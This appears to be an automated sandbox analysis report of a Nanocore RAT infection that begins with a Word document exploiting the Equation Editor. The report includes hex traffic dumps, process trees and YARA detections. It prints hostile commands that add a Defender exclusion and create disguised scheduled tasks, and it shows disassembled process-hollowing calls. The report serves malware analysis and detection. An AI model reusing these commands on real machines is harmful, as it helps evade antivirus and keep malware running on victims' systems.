                                                      Jan 24, 2022 15:31:19.088505983 CET10INData Raw: 4f 4c 5a 20 9d 10 cb 99 61 38 5f ff ff ff 02 06 19 9a 28 28 00 00 06 13 18 11 1a 20 5a 8c 45 23 5a 20 69 01 a4 ac 61 38 41 ff ff ff de 55 13 19 20 ab c3 bb f8 20 dc 96 2e 8b 61 25 13 1a 1a 5e 45 04 00 00 00 1b 00 00 00 2c 00 00 00 db ff ff ff 02
                                                      Data Ascii: OLZ a8_(( ZE#Z ia8AU .a%^E,+*() W#KZ 9a+ }Z 8Ma+`+] + .a%^E,4+2 vV7Z ea+() .L;Z gv1a+ +*(G
                                                      Jan 24, 2022 15:31:19.088526011 CET11INData Raw: 0a 20 0e 6e dd 1d 20 e1 4d f6 71 61 25 0a 1c 5e 45 06 00 00 00 3a 00 00 00 50 00 00 00 d4 ff ff ff 23 00 00 00 13 00 00 00 02 00 00 00 2b 4e 00 00 06 20 1a c5 ce 1c 5a 20 23 f2 22 35 61 2b c6 00 06 20 b7 61 f4 a7 5a 20 9e 55 e8 ad 61 2b b6 00 02
                                                      Data Ascii: n Mqa%^E:P#+N Z #"5a+ aZ Ua+(8 RGZ [ka+(6 B Z Zh%a+*0 @ a%^E+{ Z `Ka+(> da a%^E-
                                                      Jan 24, 2022 15:31:19.088546991 CET13INData Raw: 43 00 00 0a 7d 1e 00 00 04 06 20 8d d4 9f fb 5a 20 c3 2d 76 43 61 38 f9 fe ff ff 02 28 5c 00 00 06 7d 1f 00 00 04 02 16 fe 13 7d 25 00 00 04 2a 00 13 30 06 00 14 00 00 00 01 00 00 11 02 72 47 02 00 70 7e 23 00 00 04 03 28 45 00 00 06 00 00 2a 13
                                                      Data Ascii: C} Z -vCa8(\}}%*0rGp~#(E*0? tN a%^E+{(] HZ goa+*0 a%^EL*!_8, ]\8
                                                      Jan 24, 2022 15:31:19.088574886 CET14INData Raw: ff 06 6f 0e 00 00 06 11 0a 20 58 5d b1 e2 5a 20 d7 a2 4a 15 61 38 ab fc ff ff 06 6f 09 00 00 06 13 04 11 0a 20 76 1d d6 cc 5a 20 e4 64 ba 2f 61 38 90 fc ff ff 00 11 0a 20 10 80 e3 ff 5a 20 59 6a 70 7f 61 38 7c fc ff ff 11 09 2d 08 20 14 88 31 7e
                                                      Data Ascii: o X]Z Ja8o vZ d/a8 Z Yjpa8|- 1~%+ 49H%& gZa8[H sfZ ,ua8C 5WZ @O4a8/ -JZ E'CUa8 |;Z +7a8{oE, >%+ %&8,
                                                      Jan 24, 2022 15:31:19.115274906 CET16INData Raw: 20 50 41 fb 49 61 2b c9 00 11 07 20 91 f1 81 10 5a 20 9b 62 32 09 61 2b b8 00 11 07 20 62 45 29 7f 5a 20 a5 cc 43 30 61 2b a7 02 7b 1e 00 00 04 6f 46 00 00 0a 0d 2b 6a 20 0d bf 4f 06 20 9d aa c5 28 61 25 13 07 1f 09 5e 45 09 00 00 00 28 00 00 00
                                                      Data Ascii: PAIa+ Z b2a+ bE)Z C0a+{oF+j O (a%^E(0Jm8(G KkL+ GZ oa+ y#6+(H- K_%+ O%&+o(h g^Z 9la8^ !-yZ 0w,a8K


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:15:30:18
                                                      Start date:24/01/2022
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                      Imagebase:0x13f4f0000
                                                      File size:1423704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:15:30:23
                                                      Start date:24/01/2022
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:15:30:24
                                                      Start date:24/01/2022
                                                      Path:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                                                      Imagebase:0xfc0000
                                                      File size:473088 bytes
                                                      MD5 hash:7031570AA150B893F68A32900327B2AE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 40%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Start time:15:30:27
                                                      Start date:24/01/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
                                                      Imagebase:0x220f0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:15:30:27
                                                      Start date:24/01/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp
                                                      Imagebase:0x660000
                                                      File size:179712 bytes
                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:15:30:29
                                                      Start date:24/01/2022
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Imagebase:0x11f0000
                                                      File size:45216 bytes
                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                      • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                      General

                                                      Start time:15:30:32
                                                      Start date:24/01/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp
                                                      Imagebase:0x2a0000
                                                      File size:179712 bytes
                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Start time:15:30:35
                                                      Start date:24/01/2022
                                                      Path:C:\Windows\System32\taskeng.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                      Imagebase:0xffdd0000
                                                      File size:464384 bytes
                                                      MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Start time:15:30:35
                                                      Start date:24/01/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp
                                                      Imagebase:0xd70000
                                                      File size:179712 bytes
                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Start time:15:30:36
                                                      Start date:24/01/2022
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
                                                      Imagebase:0x11f0000
                                                      File size:45216 bytes
                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:15:30:37
                                                      Start date:24/01/2022
                                                      Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0
                                                      Imagebase:0x1180000
                                                      File size:45216 bytes
                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 0%, Metadefender, Browse
                                                      • Detection: 0%, ReversingLabs

                                                      General

                                                      Start time:15:30:44
                                                      Start date:24/01/2022
                                                      Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SMTP Service\smtpsvc.exe"
                                                      Imagebase:0x1390000
                                                      File size:45216 bytes
                                                      MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:13.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:22
                                                        Total number of Limit Nodes:0
                                                        execution_graph 4401 49a4e8 4402 49a52c VirtualAllocEx 4401->4402 4404 49a5aa 4402->4404 4405 49a9a8 4406 49aa2f CreateProcessA 4405->4406 4408 49ac8d 4406->4408 4397 49a610 4398 49a65c WriteProcessMemory 4397->4398 4400 49a6fb 4398->4400 4409 49e760 4410 49e77a 4409->4410 4413 49a2c8 4410->4413 4414 49a30c ResumeThread 4413->4414 4416 49a35e 4414->4416 4417 49a770 4418 49a7bc ReadProcessMemory 4417->4418 4420 49a83a 4418->4420 4421 49e6f0 4422 49e70a 4421->4422 4425 49a3b8 4422->4425 4426 49a401 Wow64SetThreadContext 4425->4426 4428 49a47f 4426->4428

                                                        Executed Functions

                                                        Function 0049A9A8 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 50 49a9a8-49aa41 52 49aa8a-49aab2 50->52 53 49aa43-49aa5a 50->53 56 49aaf8-49ab4e 52->56 57 49aab4-49aac8 52->57 53->52 58 49aa5c-49aa61 53->58 67 49ab50-49ab64 56->67 68 49ab94-49ac8b CreateProcessA 56->68 57->56 65 49aaca-49aacf 57->65 59 49aa63-49aa6d 58->59 60 49aa84-49aa87 58->60 62 49aa6f 59->62 63 49aa71-49aa80 59->63 60->52 62->63 63->63 66 49aa82 63->66 69 49aad1-49aadb 65->69 70 49aaf2-49aaf5 65->70 66->60 67->68 75 49ab66-49ab6b 67->75 86 49ac8d-49ac93 68->86 87 49ac94-49ad79 68->87 72 49aadd 69->72 73 49aadf-49aaee 69->73 70->56 72->73 73->73 76 49aaf0 73->76 77 49ab6d-49ab77 75->77 78 49ab8e-49ab91 75->78 76->70 80 49ab79 77->80 81 49ab7b-49ab8a 77->81 78->68 80->81 81->81 82 49ab8c 81->82 82->78 86->87 99 49ad89-49ad8d 87->99 100 49ad7b-49ad7f 87->100 102 49ad9d-49ada1 99->102 103 49ad8f-49ad93 99->103 100->99 101 49ad81 100->101 101->99 104 49adb1-49adb5 102->104 105 49ada3-49ada7 102->105 103->102 106 49ad95 103->106 108 49adeb-49adf6 104->108 109 49adb7-49ade0 104->109 105->104 107 49ada9 105->107 106->102 107->104 109->108
                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0049AC6F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 6dc56cf2aba13c4e17e827f06069795c9da7c0d06c5ab16f0a134f3aa22a4729
                                                        • Instruction ID: 494593e1930b0b2ee38b85088920879a0dc1cff0655d6018d45d8ca9c1464107
                                                        • Opcode Fuzzy Hash: 6dc56cf2aba13c4e17e827f06069795c9da7c0d06c5ab16f0a134f3aa22a4729
                                                        • Instruction Fuzzy Hash: 59C12570D002198FDF20CFA4C841BEEBBB6BB49304F1095AAD459B7250DB749A95CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A610 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 113 49a610-49a67b 115 49a67d-49a68f 113->115 116 49a692-49a6f9 WriteProcessMemory 113->116 115->116 118 49a6fb-49a701 116->118 119 49a702-49a754 116->119 118->119
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0049A6E3
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 64373a286a6f0a64dad4716fbf667211021b89483d8973fa228b2f6cbf5fd52b
                                                        • Instruction ID: 139d48cfd401d34b08b5de9eefa82677949ce5360fef029d8c13d8aceb26a655
                                                        • Opcode Fuzzy Hash: 64373a286a6f0a64dad4716fbf667211021b89483d8973fa228b2f6cbf5fd52b
                                                        • Instruction Fuzzy Hash: A741BDB4D002189FCF00CFA9D884AEEFBF1BB49304F24942AE415B7200D778AA55CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A770 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 124 49a770-49a838 ReadProcessMemory 127 49a83a-49a840 124->127 128 49a841-49a893 124->128 127->128
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0049A822
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: cda57e5e808a20ea54d1f21568bfc33bb140dd41f13eb8c8537259a4d7a39520
                                                        • Instruction ID: 535143a7ae6ef8ad7087ccfee81bb6e3147057277819cf52008c9033de819c27
                                                        • Opcode Fuzzy Hash: cda57e5e808a20ea54d1f21568bfc33bb140dd41f13eb8c8537259a4d7a39520
                                                        • Instruction Fuzzy Hash: 7A41BAB4D002589FCF10CFA9D884AEEFBB5BB49310F10942AE815B7200D775A956CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A4E8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 133 49a4e8-49a5a8 VirtualAllocEx 136 49a5aa-49a5b0 133->136 137 49a5b1-49a5fb 133->137 136->137
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0049A592
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 3e5e380382f4a6dc845b485dca825439209aad5b5fc842665921e6450f2cc2c5
                                                        • Instruction ID: 179b086d9ae9b76a67b69122b17811e709b29b3ea339058cbcd0b72999e75c9c
                                                        • Opcode Fuzzy Hash: 3e5e380382f4a6dc845b485dca825439209aad5b5fc842665921e6450f2cc2c5
                                                        • Instruction Fuzzy Hash: 6B4199B8D002589FCF10CFA9D884ADEFBB5BB49310F20942AE815B7310D775A956CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A3B8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 142 49a3b8-49a418 144 49a41a-49a42c 142->144 145 49a42f-49a47d Wow64SetThreadContext 142->145 144->145 147 49a47f-49a485 145->147 148 49a486-49a4d2 145->148 147->148
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0049A467
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.432590137.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_490000_plugmancdht5461.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 011aa250911ecc71a63c4e85ab6e8c80722e141ca476921df6bcd93a3d1ddcfc
                                                        • Instruction ID: 738fa74cee9057a0b050600f7aa5a15da620f282bbdfdf287e3f215d14c1ab3e
                                                        • Opcode Fuzzy Hash: 011aa250911ecc71a63c4e85ab6e8c80722e141ca476921df6bcd93a3d1ddcfc
                                                        • Instruction Fuzzy Hash: 1B41BCB4D002189FCF10CFA9D884AEEFBB5BB48314F24842AE415B7240D778AA55CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A2C8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 153 49a2c8-49a35c ResumeThread 156 49a35e-49a364 153->156 157 49a365-49a3a7 153->157 156->157
                                                        APIs
